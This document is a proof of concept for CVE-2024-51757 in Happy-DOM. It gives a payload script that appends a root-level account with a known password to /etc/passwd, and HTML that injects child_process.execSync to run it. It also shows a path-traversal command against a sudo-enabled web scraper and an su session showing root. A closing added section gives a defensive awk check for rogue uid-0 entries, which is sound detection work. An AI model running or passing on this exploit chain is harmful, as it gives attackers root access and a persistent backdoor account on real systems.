Proof of concept for CVE-2024-51757 - Happy-DOM privilege escalation vulnerability via /etc/passwd injection

CVE-2024-51757: Happy-DOM Privilege Escalation

Proof of Concept

Step 1: Create Payload Script

File: /tmp/payload.sh

#!/bin/sh
echo 'strikoder:$1$xyz$AtdNQIrMzNYyjUT1XH5IU1:0:0:root:/root:/bin/bash' >> /etc/passwd #su strikoder:abcd1234####

Make executable:

chmod +x /tmp/payload.sh

Step 2: Create Malicious HTML

File: /tmp/payload.html

<script src="https://localhost:80/'+require('child_process').execSync('/tmp/payload.sh')+'"></script>

Step 3: Exploit Path Traversal

Execute with a sudo-enabled web-scraper binary (for example):

sudo /usr/bin/web-scraper /root/web_src_downloaded/../../../tmp/payload.html

Step 4: Escalate Privileges

su strikoder
# Password: abcd1234####
id
# uid=0(root) gid=0(root) groups=0(root)
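
For defenders, the entry appended in Step 1 leaves a clear trace: a second uid-0 account whose password hash sits directly in the passwd file. The check below is an added example, not part of the original gist; `audit_passwd`, `write_sample` and the sample entries (including the placeholder hash) are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the gist): audit a passwd-format file for the
# artefacts Steps 1 and 4 leave behind. Function names are hypothetical.

# Prints one finding per line; returns 1 if anything was flagged, else 0.
audit_passwd() {
    awk -F: '
        /^[ \t]*$/ { next }              # skip blank lines
        NF != 7 {
            printf "MALFORMED line %d: expected 7 fields, got %d\n", NR, NF
            bad = 1; next
        }
        # Any account other than root that resolves to uid 0.
        $3 == 0 && $1 != "root" { printf "UID0 %s\n", $1; bad = 1 }
        # Empty password field: login without a password.
        $2 == ""                { printf "EMPTYPW %s\n", $1; bad = 1 }
        # Hash stored inline instead of the usual shadow placeholder.
        $2 ~ /^\$/              { printf "INLINEHASH %s\n", $1; bad = 1 }
        END { exit bad + 0 }
    ' "$1"
}

# Constructed sample data: two normal entries, one appended uid-0 entry with
# an inline hash (placeholder value), one entry with an empty password field.
write_sample() {
    cat > "$1" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
intruder:$1$salt$PLACEHOLDERHASHPLACEHOLDER:0:0:root:/root:/bin/bash
guest::1001:1001:guest:/home/guest:/bin/sh
EOF
}

# Demonstration run against the constructed sample.
sample=$(mktemp)
write_sample "$sample"
audit_passwd "$sample" || echo "review the entries flagged above"
rm -f "$sample"
```

On a real host the same function can be pointed at `/etc/passwd`, which is world-readable, so the check needs no elevated privileges.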